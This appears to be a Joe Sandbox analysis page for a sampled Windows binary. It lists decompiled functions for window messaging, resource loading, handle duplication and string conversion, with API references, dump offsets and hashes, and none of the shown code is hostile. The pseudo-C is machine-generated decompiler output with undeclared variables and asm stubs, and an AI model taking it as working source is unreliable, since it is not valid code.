Function 0040B87A, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040B87A(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E0040A5C3(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E0040AF65(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					E0040A5C3(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_t2 =  &_v20; // 0x4423e8
					_v20 = 0x442480;
					E0041F7F4(_t2, 0x43c590);
					asm("int3");
					_push(4);
					E0041F6EA(E00431BFC, 0, SendMessageA, _t33);
					_t29 = E0040F014(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E0040D519(_t29);
					}
					return E0041F7C2(_t24);
				}
			}

APIs

SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 0040B8A4
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 0040B8CF

Part of subcall function 0040A5C3: GetTopWindow.USER32(00000000), ref: 0040A5D1

GetCapture.USER32 ref: 0040B8E1
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0040B8F0

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: MessageSend$CaptureWindow
String ID:
API String ID: 729421689-0
Opcode ID: 6beb2dde5ff0e5b61ad0c8a51189c6d7a99162051fb35d5cd912703861ab2b7c
Instruction ID: e49af4e3184ea6db717b127f1b3927963753d97c6b9026f51526ec4d1578ed3f
Opcode Fuzzy Hash: 6beb2dde5ff0e5b61ad0c8a51189c6d7a99162051fb35d5cd912703861ab2b7c
Instruction Fuzzy Hash: 360171B13503097FFA212B208CC9FBB76ADEB88748F010539F241BB1E2CAA55C005A69

Uniqueness

Uniqueness Score: -1.00%

Function 00406C31, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406C31(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				struct HRSRC__* _t25;
				void* _t28;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t37;
				struct HINSTANCE__* _t39;

				_push(__ecx);
				_t28 = 0;
				_t40 = _a8;
				_push(_t36);
				_t34 = __ecx;
				_v8 = 0;
				if(_a8 == 0) {
					L4:
					_t37 = _a4;
					_a8 = 1;
					if(_t28 != 0) {
						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
						if(_v8 != 0) {
							FreeResource(_v8);
						}
					}
					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
					}
					_t18 = _a8;
					L10:
					return _t18;
				}
				_t39 =  *(E0040DB94(0, __ecx, _t36, _t40) + 0xc);
				_t25 = FindResourceA(_t39, _a8, 0xf0);
				if(_t25 == 0) {
					goto L4;
				}
				_t18 = LoadResource(_t39, _t25);
				_v8 = _t18;
				if(_t18 == 0) {
					goto L10;
				}
				_t28 = LockResource(_t18);
				goto L4;
			}

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 00406C55
LoadResource.KERNEL32(?,00000000), ref: 00406C61
LockResource.KERNEL32(00000000), ref: 00406C6F
FreeResource.KERNEL32(00000000), ref: 00406C9D

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 725bdaf51e1b943991e5373a74aa2e6cad060cb5622a81dcc914f303c66514db
Instruction ID: 11cc8024c2f07788693a5cf3b80dfacf3a4c7265796ede5ebdbe0383e22cf367
Opcode Fuzzy Hash: 725bdaf51e1b943991e5373a74aa2e6cad060cb5622a81dcc914f303c66514db
Instruction Fuzzy Hash: 2B112871600209EFDB108FA6D848A9B7BB9FF44355F05807AF946A7291CB78A910CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00415364, Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00415364(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, RECT* _a8, int _a12) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t35;

				_t35 = _a4;
				E0040DBE0( &_v12, __eflags,  *((intOrPtr*)(_t35 - 0xb0)));
				if(_a8 != 0) {
					IntersectRect( &_v28, _a8, _t35 - 0x9c);
					EqualRect( &_v28, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v28) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t35 - 0xac)) + 0x20)) + 0x20),  &_v28, _a12);
				}
				if(_v8 != 0) {
					_push(_v12);
					_push(0);
					E0040D3B7();
				}
				return 0;
			}

APIs

IntersectRect.USER32 ref: 004153A3
EqualRect.USER32 ref: 004153B0
IsRectEmpty.USER32(?), ref: 004153BA
InvalidateRect.USER32(?,?,?), ref: 004153D7

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Rect$EmptyEqualIntersectInvalidate
String ID:
API String ID: 3354205298-0
Opcode ID: cd773583f8eec6913ba4177664b886877b1c38ce39c4077a6852081b8256b7b2
Instruction ID: 695aae43ea9637a98273fc7b87fa48ff0bcdc9407a5be2b6daed2edba48ecd02
Opcode Fuzzy Hash: cd773583f8eec6913ba4177664b886877b1c38ce39c4077a6852081b8256b7b2
Instruction Fuzzy Hash: 8711187690020EEBCF01DF94D889FDEBBB9FF44309F004062FA04AB111D375AA959BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410317, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00410317(void* __ecx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				void* _t11;
				int _t13;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t34;
				void* _t35;

				_push(__ecx);
				_t23 = __ecx;
				_t9 = E00402EE1(__eflags, 0x10);
				_t37 = _t9;
				if(_t9 == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E004102FA(_t9, _t37);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t34 = _t32;
				if(_t13 == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E0041B0C1(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}

APIs

Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00410349
GetCurrentProcess.KERNEL32(?,00000000), ref: 0041034F
DuplicateHandle.KERNEL32(00000000), ref: 00410352
GetLastError.KERNEL32(?), ref: 0041036D

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: 127a2b6425212ae10ae3fc16ac81f62d75707bc7e267825681550bdd9f0b7852
Instruction ID: 3b195a4d90feac135872a4ffd9d4d720c51410c6d11ff7f0ee39d7a6200223b5
Opcode Fuzzy Hash: 127a2b6425212ae10ae3fc16ac81f62d75707bc7e267825681550bdd9f0b7852
Instruction Fuzzy Hash: 7C018471700204AFDB109BA6CD89F9B7BA8DF84750F144466FD05CB281DBB5EC809BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404952, Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404952(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* _t16;
				int _t17;
				int _t18;
				struct HWND__* _t19;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t32 = __edi;
				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x14));
					if(__eflags == 0) {
						L3:
						_t17 = E004037E3(0, _t25, _t32, _t35, _t39);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						_push(__edi);
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						_t19 = GetFocus();
						__eflags = _t19 -  *(_t33 + 0x20);
						if(_t19 ==  *(_t33 + 0x20)) {
							SendMessageA( *(E00409C97(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E0040CA8B( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}

APIs

EnableMenuItem.USER32 ref: 0040498A

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

GetFocus.USER32 ref: 004049A1
GetParent.USER32(?), ref: 004049AF
SendMessageA.USER32(?,00000028,00000000,00000000), ref: 004049C2

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
String ID:
API String ID: 3849708097-0
Opcode ID: e72bafc065e83abc75d2031577df1877b7e0563ed678ea765f6496426475fe74
Instruction ID: 914c255c74ae2b2e161b517f63bea8142904b75b6db113dff41908d8fcf81d8c
Opcode Fuzzy Hash: e72bafc065e83abc75d2031577df1877b7e0563ed678ea765f6496426475fe74
Instruction Fuzzy Hash: F5113CF1100600AFDB209F60DC85A6BB7B5FBD4326B10C63EF286625A0C734AC45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5C3, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040A5C3(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E00409CBE(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E0040A2E8(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E0040A5C3(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}

APIs

GetTopWindow.USER32(00000000), ref: 0040A5D1
GetTopWindow.USER32(00000000), ref: 0040A610
GetWindow.USER32(00000000,00000002), ref: 0040A62E

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 5fdfce87b7b707005e05352e841891f402f616d7f1fe5be37b2960e84f9d87ac
Instruction ID: 6bb7837223b1437e7f35f4f841dbeb3d150c6d8cc2c7bce5033a1c3b76c9a84e
Opcode Fuzzy Hash: 5fdfce87b7b707005e05352e841891f402f616d7f1fe5be37b2960e84f9d87ac
Instruction Fuzzy Hash: AC01ED3600161ABBCF126F559C04EDF3B36FF48350F054426F940651A1D73AC972EBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC5F, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040EC5F(short* _a4) {
				char* _v0;
				int _v8;
				int _v16;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t6;
				char* _t7;
				void* _t12;
				char* _t13;
				void* _t15;
				void* _t16;
				short* _t20;

				_t20 = _a4;
				if(_t20 != 0) {
					__imp__#7(_t20, _t16, _t12);
					_v8 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_t13 = _t7;
					__eflags = _t13;
					if(__eflags == 0) {
						E004037AF(_t13, _t15, WideCharToMultiByte, 0, __eflags);
					}
					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
					return _t13;
				}
				return 0;
			}

0x0040ec61
0x0040ec6a
0x0040ec73
0x0040ec87
0x0040ec8b
0x0040ec8f
0x0040ec93
0x0040ec99
0x0040ec9b
0x0040ec9d
0x0040ec9f
0x0040ec9f
0x0040ecb2
0x00000000
0x0040ecb7
0x00000000

APIs

SysStringLen.OLEAUT32(?), ref: 0040EC73
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,0041BC26,00000000,00000018,0041BF6C), ref: 0040EC8B
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0040EC93
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,0041BC26,00000000,00000018,0041BF6C), ref: 0040ECB2

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: d53530b6845a85bbb5eb6b3b7f3747d219b095aaba301d680609f69000207b61
Instruction ID: a8860d5d0e509bcf303a4908704158829630dd5dfdd3e8d3169bb9f7432348a3
Opcode Fuzzy Hash: d53530b6845a85bbb5eb6b3b7f3747d219b095aaba301d680609f69000207b61
Instruction Fuzzy Hash: 47F012761062287F93211BA79C4CCABBF9CFE9A3E5B10093AF549A2150D6799810C6F5

Uniqueness

Uniqueness Score: -1.00%

Function 0042AC64, Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042AC64(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0042A561(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0042A64D(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0042AB6C(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0042AAB3(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

APIs

__cftof_l.LIBCMT ref: 0042AC88

Part of subcall function 0042AAB3: __fltout2.LIBCMT ref: 0042AADD

__cftog_l.LIBCMT ref: 0042ACAE
__cftoe_l.LIBCMT ref: 0042ACE0

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 3dbc08a52ec38b7d7a761f0fe1270b82bedc95c96d3fe4623e25e7259ca750c8
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: 8B017B3250015EBBCF125F85ED018EE3F22BF19344B888416FE1959130D23BC9B1EB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00409F82, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00409F82(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E00409F82(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E00409C97(_t13, _t14, _t18);
						}
						_t10 = E00409CBE(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E00409F82(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

APIs

GetDlgItem.USER32 ref: 00409F8D
GetTopWindow.USER32(00000000), ref: 00409FA0

Part of subcall function 00409F82: GetWindow.USER32(00000000,00000002), ref: 00409FE7

GetTopWindow.USER32(?), ref: 00409FD0

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 6b3d63afe5932d7f4a6ca00e44b07854abff9deeab6878bfa63d6e411355adcf
Instruction ID: f6ea6eabe51ed2d5a48b12d105cf3c13206c2d8bb6ceeb41934ac94127644c0a
Opcode Fuzzy Hash: 6b3d63afe5932d7f4a6ca00e44b07854abff9deeab6878bfa63d6e411355adcf
Instruction Fuzzy Hash: 89018F32505617B7CB222F519C00EDF3A58AF807E0F054036FD00F6292D739DD11A6A9

Uniqueness

Uniqueness Score: -1.00%

Function 0042526C, Relevance: 6.0, APIs: 4, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0042526C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x43f810);
				E00421418(__ebx, __edi, __esi);
				_t31 = E0042485D(__edx, __edi, _t35);
				_t15 =  *0x443df4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00422E2D(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x443cf8; // 0x2241320
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x4438d0;
								if(__eflags != 0) {
									_push(_t33);
									E0041E18A(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x443cf8; // 0x2241320
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x443cf8; // 0x2241320
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00425307();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0041F916(_t25, _t29, _t31, 0x20);
				}
				return E0042145D(_t33);
			}

APIs

Part of subcall function 0042485D: __getptd_noexit.LIBCMT ref: 0042485E
Part of subcall function 0042485D: __amsg_exit.LIBCMT ref: 0042486B

__amsg_exit.LIBCMT ref: 00425298
__lock.LIBCMT ref: 004252A8
InterlockedDecrement.KERNEL32(?), ref: 004252C5
InterlockedIncrement.KERNEL32(02241320), ref: 004252F0

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: b1b043d092f6a2a1616c32b40d31738fdcf655e9fae88bb2fc2316b540347ebb
Instruction ID: 724aaa48ea21f26d78a4a53a77eade52139c7390ef92faafb76bd8af03b18e74
Opcode Fuzzy Hash: b1b043d092f6a2a1616c32b40d31738fdcf655e9fae88bb2fc2316b540347ebb
Instruction Fuzzy Hash: 50017032B01A32E7CB11AB55B80674A7360AB05715F51016BF814A73D0CB38A9818FED

Uniqueness

Uniqueness Score: -1.00%

Function 0040C865, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C865(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E0040C41C(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E0040DB94(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 0040C887
LoadResource.KERNEL32(?,00000000,?,?,?,?,0040605B,?,?,00401E60,8FFEDB05), ref: 0040C893
LockResource.KERNEL32(00000000,?,?,?,?,0040605B,?,?,00401E60,8FFEDB05), ref: 0040C8A0
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,0040605B,?,?,00401E60,8FFEDB05), ref: 0040C8BB

Memory Dump Source

